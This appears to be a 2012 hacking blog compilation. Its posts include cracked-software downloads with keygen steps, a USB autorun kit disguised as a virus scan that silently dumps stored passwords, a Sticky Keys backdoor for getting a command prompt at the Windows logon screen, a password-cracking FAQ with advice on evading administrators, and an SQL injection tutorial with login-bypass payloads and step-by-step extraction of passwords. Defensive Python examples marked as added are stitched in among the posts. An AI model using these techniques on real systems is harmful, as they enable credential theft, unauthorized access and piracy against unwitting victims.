FACEBOOK SWITCHES OFF FACIAL RECOGNITION TOOL IN EUROPE

Written By TAC Team on Tuesday 30 October 2012 | 01:51

London: Facebook said on Friday it had switched off the facial-recognition tool that prompts users to "tag" photographs uploaded to its website following a privacy investigation.
     The feature was identified by regulators as one of the main privacy threats posed by the social networking site. Ireland's data protection commissioner, Billy Hawkes, who launched the probe because Facebook's European operations are based in Ireland, said he was happy that the site had agreed to remove the tool in Europe by October 15.
     New users are already unable to access it. Hawkes said: "I am satisfied that the review has demonstrated a clear and ongoing commitment on the part of FBI to comply responsibilities."
     He added: "By doing so it is sending a clear signal of its wish to demonstrate its commitment to best practice in data protection compliance." Facebook said in a statement: "In light of discussions with our regulator in Ireland, we have agreed to suspend the Tag Suggest feature in Europe."
     It said it would work with the Irish authorities "on the appropriate way to obtain user consent for this kind of technology under European rules".
     Facebook was keen to encourage members to "tag" their friends in photographs because it ensures they are shared more widely, but it has been a controversial addition to the site. Europe-versus-Facebook, an Austrian campaign group that has been fighting for clearer privacy policies on Facebook and already took its complaints to the DPC last year, welcomed Friday's ruling.

SOURCE: TIMES OF INDIA NEWSPAPER

ANGRY BIRDS 4 IN 1 (All Full versions)

Written By TAC Team on Tuesday 23 October 2012 | 04:30





Activation Key :

FULL-GAME-SOFT-WARE



STELLAR PHOENIX WINDOWS DATA RECOVERY PROFESSIONAL 5.0 Incl Crack




Recovers deleted files and folders from Windows Operating System based hard drive and other storage media

Stellar Phoenix, our award winning software recovers lost and deleted data. It helps in cases of hard drive corruption or formatting, virus attack, malfunction etc.

Key Features 
Data lost due to formatting or corruption of partitions.
Recover data from internal and all external storage media.
Supports Recovery from Hard Drive Greater than 2TB
Supports all versions of Windows and is also ready for Windows 8


USB DISK SECURITY 6.1.0.432 FULL






USB storage is a common source of infection with potentially dangerous content, but a lot of antivirus software can not effectively detect the malicious programs from USB drives. USB Disk Security provides the best protection against any threats when using USB drives.

Features of USB Disk Security:
• Prevent any threats via USB storage
• Protect offline computer
• Prevent data loss via USB storage
• Never slow down your computer
• Compatible with all antivirus software
• Free update for lifetime

This application is installed on the computer so that whenever you plug a USB drive into the computer, it analyzes the drive immediately and shows you the threats.

1. Extract
2. Install Setup
3. Run it, click Activate Product
4. Run Keygen, generate code
5. Copy the name and code to the registration box
6. Click Register! You're done

TUNEUP UTILITIES 2013 INCL. PATCH

TuneUp Utilities 2013 v13.0.2013.194 - Final (Incl. Crack-iOTA)


TuneUp Utilities can make your Windows operating system faster, more comfortable and more secure with just a few mouse clicks. And all operations performed on the operating system are completely safe, because all changes are monitored by TuneUp Rescue Center and can be undone at any time.
Maintain System

Regular maintenance increases the stability of your PC, but is complicated and takes a lot of time when doing it manually. Spare yourself the stress! With TuneUp Utilities, you can clean up your computer and delete unnecessary files with only one click. Neat!

• 1-Click Maintenance and Automatic Maintenance

• Optimize system startup and shutdown

• Defragment hard disks

• Remove broken shortcuts

• Defragment registry

• Clean registry
Increase performance

Whether you are working or gaming: TuneUp Utilities increases the performance of your PC. Programs that are used rarely or never are tracked down, startup processes are shortened and unwanted garbage files are eliminated. For trouble-free working on your PC.

• Turbo Mode

• Configure Live Optimization

• Free up disk space

• Configure system startup

• Display and uninstall programs
Fix problems

With only a few clicks, you can fix typical Windows problems as easy as pie — without being a PC expert yourself. TuneUp Utilities finds errors on data carriers and fixes them automatically — about 60 of the most frequent problems under XP™, Vista™, and Windows 7™. TuneUp Utilities can even restore files deleted by accident — quickly, easily, and reliably.

• Fix typical problems

• Restore deleted data

• Check hard drive for errors

• Manage running programs
Customize Windows

Give your Windows a new look with TuneUp Utilities and customize programs and system settings to meet your needs: cool new boot screens, icons, and animations provide that personalized look for your Desktop. You can easily customize the appearance of Windows and settings of many programs to your liking.

• Personalize Windows appearance

• Change Windows settings
TuneUp Utilities 2013

NEW! TuneUp Disk Cleaner 2013: Wipes system clutter from over 150 popular programs

NEW! TuneUp Browser Cleaner 2013: Cleans up 25 browsers

MORE POWERFUL! TuneUp Registry Cleaner & TuneUp Shortcut Cleaner

NEW! TuneUp Live Optimization 2.0: Boosts performance of applications

DRIVER GENIUS PROFESSIONAL 11.0.0.1136 INCL. PATCH !!



Driver Genius Professional Edition
Version: 11.0.0.1136
File Size: 13.69 MB
Patch : (2 MB)


Driver Genius Professional Features
1. Find latest driver for your computer. One click to update all drivers.

2. Automatically check for driver updates, so your drivers are always up to date.

3. Quickly backs up drivers installed in the system. Free to backup all drivers now!

4. Package all drivers to an executable auto installer. One click to restore all drivers.

5. Remove invalid or useless drivers, improve system performance and stability.

6. New system information tool. Detailed hardware inventory.

Operating System: 
Windows 2000/XP/2003/Vista/XP x64/Server 2003 x64/Vista x64/Windows 7/Windows 7 x64/Windows Server 2008/Windows server 2008 x64/Windows 8/Windows 8 x64

Driver Genius Professional Edition 11 (Version:11.0.0.1136)

1. Added Windows 8 Release Preview support.

2. Optimized Download-Time out settings to achieve more steady connection.

3. Hardware Info:
Added new hardware support and optimized performance for sensor monitoring.

4. Added Bulgarian and Hungarian languages support.

Bug fixes:

1. Fixed Download missions load repeatedly problem.

2. Fixed Hardware Info can't load drivers successfully in scheduled task mode.

Instructions:

1. Install the driver genius pro.

2. At the end of the installation, do not run Driver Genius.

3. Run patch as admin & apply the patch.

4. Enjoy :)




CONVERT WIN 7 TO WIN 8 USING SCREEN PACK

Transform Windows 7 and XP to Windows 8



Download offline installer:
X64: Download
X86: Download
XP: Download


Support:
Windows 7 , Windows 7 SP1 , Windows XP - [X86_X64] - [All Language] - [All Version]
Note: The Skin Packs installer has an easy and safe install option. Please uninstall old or other versions of skin packs before installing a new version. Before installing, close all running programs; after finishing, restart your system.


HI GUYS IF YOU WANT MORE WINDOWS 8 SCREEN PACK JUST COMMENT BELOW.
Transform Windows 7 to Android Jelly Bean



Download offline installer:
X64: Download
X86: Download

Note: The Skin Packs installer has an easy and safe install option. Please uninstall old or other versions of skin packs before installing a new version. Before installing, close all running programs; after finishing, restart your system.
Support:
Windows 7 , Windows 7 SP1 - [X86_X64] - [All Language] - [All Version]




COMMENTS BELOW....

TRACE YOUR FRIEND'S IP DURING CHAT


LEARN HOW TO FIND YOUR IP

It is simple: go to www.Google.com, type "WHAT IS MY" into the search bar, and you will find your IP address in the search results.


HOW TO FIND THE IP ADDRESS OF ANY WEBSITE USING COMMAND PROMPT

You can see the ping command and the IP address.


Press "Win+R" and type "CMD". Then type the command "ping www.google.com".

How to trace the IP of a friend during chatting

Find someone's IP address during chat when you are chatting on Facebook, Google+, Gmail, Orkut etc. with that person.
Follow these steps:

1) First, invite or ping that user for a chat. Then open 'Command Prompt' on your PC (Start –> Run –> cmd).
Note: Before trying this, make sure you close all the other tabs in your browser, so that only one chat service is open. Also, if possible, delete all the history and cache from your browser.

2) When the command prompt opens, type the following command and hit Enter.
netstat -an (put a space between "netstat" and "-an")
You will get the IP addresses of all established connections there. Note down all the suspicious IPs.

3) Now trace that user using his IP address. Go to this link: http://www.ip-adress.com/ip_tracer/ and paste the IP address in the box as shown below in the image. It will show you the location of the user.


It will show you all the information about that user along with the ISP and a location on the map.
Now, on the map, just click on "click for big ip address location"; in the big picture you can actually zoom in and try to recognize the area.

USE PEN DRIVE AS VIRTUAL RAM



SIMPLE STEPS :

1) Insert the pen drive into the computer.

2) Now right-click on the pen drive and go to Properties.


3) From there, click on "READYBOOST".


4) Now click on "USE THIS DEVICE", then click Apply and OK. The pen drive will use all of its memory.

When you do not want to use it as RAM, select "DO NOT USE THIS DEVICE".

HOW TO INJECT ROOT KIT

Written By TAC Team on Friday 19 October 2012 | 00:06

I recently came to know that Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pen drive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our own rootkit.


Here is a step by step procedure to create the password hacking toolkit.

1. Download all the 5 tools, extract them and copy only the executable (.exe files) into your USB Pen Drive. Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION=Perform a Virus Scan

Save the Notepad and rename it as autorun.inf. Now copy the autorun.inf file onto your USB pen drive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it to launch.bat. Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen drive on any computer to sniff the stored passwords. Just follow these steps:


  • Insert the pen drive and the autorun window will pop up. (This is because we have created an autorun pen drive.)
  • In the pop-up window, select the first option ("Perform a Virus Scan". This function can be changed in the previous step).
  • Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
  • Remove the pen drive and you'll see the passwords in the .TXT files.
  • This hack works on Windows 2000, XP and Vista
This procedure will only recover the stored passwords (if any) on the Computer.
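
For anyone who has to inspect a removable drive before it is trusted, the two files above leave clear traces. The following is an added example, not part of the original post: a small Python audit that parses autorun.inf and the launcher script and flags the three things this procedure relies on (a script as the launch target, an action label dressed up as a security feature, and tools run with /stext to dump output to text files). The function names, rule names, the lure word list and the benign sample are assumptions made for this example.

```python
import re

# Extensions that start a script host or command interpreter when "opened".
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr", ".pif")
# Wording that dresses an AutoPlay entry up as a security feature (assumed list).
LURE = re.compile(r"\b(virus|scan|antivirus|security|protect\w*)\b", re.I)
# The "/stext <file>" switch used by the launcher shown in the post.
STEXT = re.compile(r"^\s*(?:start\s+)?(\S+\.exe)\s+/stext\s+(\S+)", re.I)


def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lower-cased."""
    keys, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            # Section names are matched case-insensitively ([AutoRun], [autorun]).
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip().lower()] = value.strip()
    return keys


def audit_autorun(text):
    """Flag launch targets that are scripts and action labels that act as lures."""
    keys = parse_autorun(text)
    findings = []
    for key, value in keys.items():
        is_launcher = key in ("open", "shellexecute") or (
            key.startswith("shell\\") and key.endswith("\\command"))
        parts = value.split()
        target = parts[0].lower() if parts else ""
        if is_launcher and target.endswith(SCRIPT_EXTS):
            findings.append(("script-launcher", f"{key}={value}"))
    action = keys.get("action", "")
    if LURE.search(action):
        findings.append(("lure-label", action))
    return findings


def audit_launcher(text):
    """Flag batch lines that run a tool with /stext and write its output to a file."""
    findings = []
    for line in text.splitlines():
        match = STEXT.match(line)
        if match:
            findings.append(("stext-dump", match.group(1).lower(), match.group(2)))
    return findings


# The two files exactly as given in the post above.
PAGE_AUTORUN = """[autorun]
open=launch.bat
ACTION=Perform a Virus Scan
"""
PAGE_LAUNCHER = """start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
"""
# Constructed benign sample: an installer disc that only sets an icon and a label.
BENIGN_AUTORUN = "[AutoRun]\nicon=setup.ico\nlabel=Install Disc\n"

if __name__ == "__main__":
    for finding in audit_autorun(PAGE_AUTORUN) + audit_launcher(PAGE_LAUNCHER):
        print(finding)
```

Disabling AutoRun for removable media (the NoDriveTypeAutoRun policy value) removes the trigger altogether; the audit is for drives that still have to be examined.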

Enjoy..!!

HOW TO CREATE A BACKDOOR IN WINDOWS

Written By TAC Team on Thursday 18 October 2012 | 23:38

Firstly,

What is BACKDOOR?
A backdoor is a means of access to a computer program that bypasses security mechanisms. A programmer may sometimes install a back door so that the program can be accessed for troubleshooting or other purposes.


Step 1: On the welcome screen, press the Shift key 5 times.

Step 2: A Sticky Keys pop-up will open; just click Yes.

Step 3: Then log in with an admin account and go to the system32 folder.

Step 4: Copy sethc.exe and cmd.exe to the desktop.

Step 5: Then go to Folder Options --> View --> deselect "Hide extensions for known file types".

Step 6: Rename sethc.exe to cmd.exe and vice versa.

Step 7: Copy, paste and replace both files in system32 with your files.

Step 8: Then log off and press Shift 5 times; cmd will open, and from there you can do anything with that computer.
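
A check for this swap, as an added example that is not part of the original post: because steps 6 and 7 exchange the two files, comparing sethc.exe with cmd.exe on the same machine finds nothing (after the swap they still differ), so the check below compares each watched file against a known-good baseline of SHA-256 hashes and reports whose content it now holds. It goes beyond the post by also watching the other accessibility programs reachable from the logon screen; the function names and the tiny stand-in files are assumptions of this example.

```python
import hashlib
import tempfile
from pathlib import Path

# Accessibility programs reachable from the logon screen, plus cmd.exe itself.
WATCHED = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
           "narrator.exe", "displayswitch.exe", "cmd.exe")


def sha256_file(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(system_dir, names=WATCHED):
    """Record name -> SHA-256 from a trusted copy (clean image, golden host).

    The baseline has to be refreshed after OS updates that replace these files.
    """
    base = Path(system_dir)
    return {n: sha256_file(base / n) for n in names if (base / n).is_file()}


def find_replaced(system_dir, baseline):
    """Return (name, status, content_of) for every watched file that changed.

    content_of names the baseline file whose bytes now sit under this name,
    or None when the content matches nothing in the baseline.
    """
    owner = {digest: name for name, digest in baseline.items()}
    findings = []
    for name, expected in sorted(baseline.items()):
        path = Path(system_dir) / name
        if not path.is_file():
            findings.append((name, "missing", None))
            continue
        actual = sha256_file(path)
        if actual != expected:
            findings.append((name, "replaced", owner.get(actual)))
    return findings


def demo():
    """Run the check on a constructed stand-in for system32 (not real binaries)."""
    with tempfile.TemporaryDirectory() as tmp:
        sysdir = Path(tmp)
        for name in WATCHED:
            (sysdir / name).write_bytes(b"constructed contents of " + name.encode())
        baseline = build_baseline(sysdir)
        clean = find_replaced(sysdir, baseline)

        # Reproduce the end state of steps 6 and 7: each file carries the other's name.
        sethc, cmd, spare = sysdir / "sethc.exe", sysdir / "cmd.exe", sysdir / "swap.tmp"
        sethc.rename(spare)
        cmd.rename(sethc)
        spare.rename(cmd)

        swapped = find_replaced(sysdir, baseline)
        # The naive test "is sethc.exe identical to cmd.exe?" misses a full swap.
        naive_match = sha256_file(sethc) == sha256_file(cmd)
    return clean, swapped, naive_match


if __name__ == "__main__":
    clean, swapped, naive_match = demo()
    print("before swap:", clean)
    print("after swap: ", swapped)
    print("naive sethc == cmd check fires:", naive_match)
```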

Enjoy..!!

CYBER CRIME: AMANDA TODD WAS FOUND DEAD ON OCTOBER 10

Written By TAC Team on Wednesday 17 October 2012 | 05:59

Tragic: Amanda Todd, 15, was found dead on Wednesday in a suspected suicide
Tragic: Amanda Todd, 15, was found dead on October 10 after killing herself to escape cyber bullies
The internet vigilantes: Anonymous hackers' group outs man, 32, 'who drove girl, 15, to suicide by spreading topless photos of her'

Anonymous has named a man it claims posted topless pictures of a 15-year-old girl online and harassed her so relentlessly that she killed herself.

Amanda Todd, from Vancouver, Canada, was found hanged in her home on October 10, just weeks after she uploaded a video to YouTube detailing her horrific treatment at the hands of cyber bullies.

When she was just 12, a man in an internet chat room convinced her to flash her breasts, and a year later, he plastered a picture of the incident across Facebook.

Now in a vigilante move, Anonymous, the world's largest hacking group, has named the man allegedly responsible for the picture.

The group claims that he is a 32-year-old from British Columbia, but MailOnline has chosen not to identify him for legal reasons.

As Todd's supporters set up Facebook pages warning the man to 'sleep with one eye open', the move by Anonymous sparks concerns over its abilities to create a 'trial by internet' - bypassing the justice system and casting guilt.

In a video posted to YouTube by Anonymous, a figure claims the group lists his personal information, including his date of birth and address.

It explains that his username appears on websites where he 'blackmailed' and gave advice to young girls. The same username is also tied to a website with a 'jailbait' photo gallery.


PASSWORD HACKING FAQ

Written By TAC Team on Tuesday 16 October 2012 | 21:52



Some of the password basics

Most accounts on a computer system usually have some method of restricting access to that account, usually in the form of a password. When accessing the system, the user has to present a valid ID to use the system, followed by a password to use the account. Most systems either do not echo the password back on the screen as it is typed, or they print an asterisk in place of the real character.
On most systems, the password is typically run through some type of algorithm to generate a hash. The hash is usually more than just a scrambled version of the original text that made up the password; it is usually a one-way hash. The one-way hash is a string of characters that cannot be reversed into its original text. You see, most systems do not "decrypt" the stored password during authentication; they store the one-way hash. During the login process, you supply an account and password. The password is run through an algorithm that generates a one-way hash. This hash is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied.
Cryptographically speaking, some algorithms are better than others at generating a one-way hash. The main operating systems we are covering here — NT, Netware, and Unix — all use an algorithm that has been made publicly available and has been scrutinized to some degree.
To crack a password requires getting a copy of the one-way hash stored on the server, and then using the algorithm to generate your own hash until you get a match. When you get a match, whatever word you used to generate your hash will allow you to log into that system. Since this can be rather time-consuming, automation is typically used. There are freeware password crackers available for NT, Netware, and Unix.

1. Why protect the hashes?

If the one-way hashes are not the password itself but a mathematical derivative, why should they be protected? Well, since the algorithm is already known, a password cracker could be used to simply encrypt the possible passwords and compare the one-way hashes until you get a match. There are two types of approaches to this — dictionary and brute force.
Usually the hashes are stored in a part of the system that has extra security to limit access from potential crackers.

2. What is a dictionary password cracker?

A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password.
Some of these dictionary crackers can “manipulate” each word in the wordlist by using filters. These rules/filters allow you to change “idiot” to “1d10t” and other advanced variations to get the most from a word list. The best known of these mutation filters are the rules that come with Crack (for Unix). These filtering rules are so popular they have been ported over to cracking software for NT.
If your dictionary cracker does not have manipulation rules, you can “pre-treat” the wordlist. There are plenty of wordlist manipulation tools that allow all kinds of ways to filter, expand, and alter wordlists. With a little careful planning, you can turn a small collection of wordlists into a very large and thorough list for dictionary crackers without those fancy word manipulations built in.

3. What is a brute force password cracker?

A brute force cracker simply tries all possible passwords until it gets the password. From a cracker perspective, this is usually very time consuming. However, given enough time and CPU power, the password eventually gets cracked.
Most modern brute force crackers allow a number of options to be specified, such as maximum password length or characters to brute force with.

4. Which method is best for cracking?

It really depends on your goal, the cracking software you have, and the operating system you are trying to crack. Let’s go through several scenarios.
If you remotely retrieved the password file through some system bug, your goal may be to simply get logged into that system. With the password file, you now have the user accounts and the hashes. A dictionary attack seems like the quickest method, as you may simply want access to the box. This is typical if you have a method of leveraging basic access to gain god status.
If you already have basic access and used this access to get the password file, maybe you have a particular account you wish to crack. While a couple of swipes with a dictionary cracker might help, brute force may be the way to go.
If your cracking software does both dictionary and brute force, and both are quite slow, you may just wish to kick off a brute force attack and then go about your day. By all means, we recommend a dictionary attack with a pre-treated wordlist first, followed up by brute force only on the accounts you really want the password to.
You should pre-treat your wordlists if the machine you are going to be cracking from bottlenecks more at the CPU than at the disk controller. For example, some slower computers with extremely fast drives make good candidates for large pre-treated wordlists, but if you have the CPU cycles to spare you might want to let the cracking program’s manipulation filters do their thing.
A lot of serious hackers have a large wordlist in both regular and pre-treated form to accommodate either need.

5. What is a salt?

To increase the overhead in cracking passwords, some algorithms employ salts to add further complexity and difficulty to the cracking of passwords. These salts are typically 2 to 8 bytes in length, and algorithmically introduced to further obfuscate the one-way hash. Of the major operating systems covered here, only NT does not use a salt. The specifics for salts for both Unix and Netware systems are covered in their individual password sections.
Historically, the way cracking has been done is to take a potential password, encrypt it and produce the hash, and then compare the result to each account in the password file. By adding a salt, you force the cracker to have to read the salt in and encrypt the potential password with each salt present in the password file. This increases the amount of time to break all of the passwords, although it is certainly no guarantee that the passwords can’t be cracked. Because of this most modern password crackers when dealing with salts do give the option of checking a specific account.
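
What the salt changes for whoever stores the passwords, shown as an added example that is not part of the original FAQ. SHA-256 stands in for any fast unsalted hash, and PBKDF2 with a 16-byte random salt is this example's choice of salted scheme, not the algorithm used by NT, Netware or Unix; the accounts and passwords are constructed. It shows that an unsalted table reveals which accounts share a password and lets one hash computation be compared against every account, while a salted table does neither.

```python
import hashlib
import hmac
import os
from collections import defaultdict

ITERATIONS = 100_000  # work factor assumed for this example


def unsalted_digest(password):
    """Fast unsalted one-way hash (SHA-256 as a stand-in)."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def new_salted_record(password):
    """Create a stored record with a fresh random salt per account."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return {"salt": salt, "digest": digest}


def verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], ITERATIONS)
    return hmac.compare_digest(candidate, record["digest"])


def _digest_of(stored):
    return stored["digest"] if isinstance(stored, dict) else stored


def _salt_of(stored):
    return stored["salt"] if isinstance(stored, dict) else None


def shared_digests(table):
    """Groups of accounts whose stored digest is byte-for-byte identical."""
    groups = defaultdict(list)
    for user, stored in table.items():
        groups[_digest_of(stored)].append(user)
    return sorted(sorted(users) for users in groups.values() if len(users) > 1)


def hashes_per_guess(table):
    """Hash computations needed to test ONE candidate word against the whole table.

    Without salts one computation can be compared with every row; with
    per-account salts the word has to be hashed once per distinct salt.
    """
    return len({_salt_of(stored) for stored in table.values()})


# Constructed accounts: alice and bob happen to pick the same password.
ACCOUNTS = {"alice": "Summer2012", "bob": "Summer2012", "carol": "t7#Lq9vz"}


def build_tables():
    unsalted = {user: unsalted_digest(pw) for user, pw in ACCOUNTS.items()}
    salted = {user: new_salted_record(pw) for user, pw in ACCOUNTS.items()}
    return unsalted, salted


if __name__ == "__main__":
    unsalted, salted = build_tables()
    print("unsalted, shared digests:", shared_digests(unsalted))
    print("salted, shared digests:  ", shared_digests(salted))
    print("hashes per guess:", hashes_per_guess(unsalted), "vs", hashes_per_guess(salted))
    print("bob logs in:", verify("Summer2012", salted["bob"]))
```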

6. What are the dangers of cracking passwords?

The dangers are quite simple, and quite real. If you are caught with a password file you do not have legitimate access to, you are technically in possession of stolen property in the eyes of the law. For this reason, some hackers like to run the cracking on someone else's systems, thereby limiting their liability. I would only recommend doing this on a system you have a legitimate or well-established account on if you wish to keep a good eye on things, but perhaps have a way of running the cracking software under a different account than your own. This way, if the cracking is discovered (as it often is — cracking is fairly CPU-intensive), it looks to belong to someone else. Obviously, you would want to run this under system administrator privileges as you may have a bit more control, such as assigning lower priority to the cracking software, and hiding the results (making it less obvious to the real administrator).
Being on a system you have legit access to also allows you better access to check on the progress. Of course, if it is known you are a hacker, you’ll still be the first to be blamed whether the cracking software is yours or not!
Running the cracking software in the privacy of your own home has the advantage of allowing you to throw any and all computing power you have at your disposal at a password, but if caught (say you get raided) then there is little doubt whose cracking job is running. However, there are a couple of things you can do to protect yourself: encrypt your files. Only decrypt them when you are viewing them, and wipe and/or encrypt them back after you are done viewing them.

7. Is there any way I can open a password-protected Microsoft Office document?

Certainly! There are plenty of commercial programs that will do this, but we give props to Elcomsoft. 30-day trial versions are available here.

Enjoy..!!

HACKING DATABASE




Databases have been the heart of commercial websites. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get credit card information. Just one hack on a commercial site will bring down its reputation and also its customers, as they want their credit card info secured. Most commercial websites use Microsoft SQL (MS SQL) and Oracle database servers. MS SQL still owns the market because the price is very low, while Oracle servers come at a high price. Some time ago Oracle claimed to be "unbreakable", but hackers took it as a challenge and showed lots of bugs in it too!! I have been addicted to hacking database servers for a few months, so I decided to share the knowledge with others. The things discussed here were not discovered by me, but I have experimented with them a lot.

The user will type his login name and password in the login.htm page and click the submit button. The values of the text boxes will be passed to the logincheck.asp page, where they will be checked using the query string. If it doesn't get an entry satisfying the query and reaches end of file, a "login failed" message will be displayed. Everything seems to be OK. But wait a minute. Think again. Is everything really OK?! What about the query?! Is it OK? Well, if you have made a page like this, then a hacker can easily log in successfully without knowing the password. How? Let's look at the query again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
 

Now if a user types his login name as "Chintan" and password as "h4x3r", then these values will pass to the asp page with the post method and the above query will become

"Select * from table1 where login='Chintan' and password='h4x3r' "

That's fine. There will be an entry Chintan and h4x3r in the login and password fields in the database, so we will receive a message as login successful. Now what if I type the login name as "Chintan" and the password as
hi' or 'a'='a in the password text box? The query will become as follows:

"Select * from table1 where login='Chintan' and password='hi' or 'a'='a' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of the hacker, which was due to the carelessness of the web designer?!!

The query is satisfied because the condition has changed: now either the password needs to be 'hi', or 'a' needs to be equal to 'a'. Clearly the password is not 'hi', but at the same time 'a'='a'. So the condition is satisfied, and a hacker is in with login "Chintan"!! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
 
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here, the -- above turns the rest of the query string into a comment, so the other conditions will not be checked. Similarly you can provide
 

Chintan ' --
 
Chintan " --

or other such possibilities in the login name text box, and anything as the password, which might let you in, because in the query string only the login name is checked as "Chintan" and the rest is ignored due to --. If you are lucky enough, you will find a website where the web designer has made the above mistake, and then you will be able to log in as any user!!!
 

IMP NOTE: Hey guys, I have put up a page where you can experiment for yourself with the SQL injection vulnerability. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advanced hacking of databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw how to log in successfully without knowing the password. Now I will show you how to read the whole database just by using queries in the URL!! This works only for IIS, i.e. asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45
 

in the URLs. The '?' shows that after it, the value 45 is passed to a hidden datatype id. If you don't understand, recall the example above: login.htm has two input text fields named 'login_name' and 'pass', and their values were passed to the logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using

http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note: The difference between the get and post methods is that the post method doesn't show the values passed to the next page in the URL, while the get method shows them. To understand more about how they work internally, read the HTTP protocol RFC 1945 and RFC 2616.

What I mean to say is that after '?', the variables which are going to be used in that page are assigned their values. As above, login_name is given the value Chintan. Different variables are separated by the operator '&'.

OK, so coming back: id will mostly be of hidden type, and its value will change according to the links you click. This value of id is then passed into the query in the mypage.asp page, and according to the results you get the desired page on your screen. Now if you just change the value of id to 46, you will get a different page.

Now let's start hacking the database. Let's use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
 

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
 
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'logintable' to a column of data type int.
/mypage.asp, line

From the error it's clear that the first table is 'logintable'. It seems that this table might contain login names and passwords :-) So let's move into it. Type the following in the URL
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
 

output
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name we will type


http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id')--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name, 'login_name'. To get the third field name we will write


http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' AND COLUMN_NAME NOT IN ('login_id','login_name')--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

That's it. We ultimately get the 'passwd' field. Now let's get the login names and passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

That's the login name "Rahul", and to get the password of Rahul the query would be
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
 
where login_name='Rahul'--

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

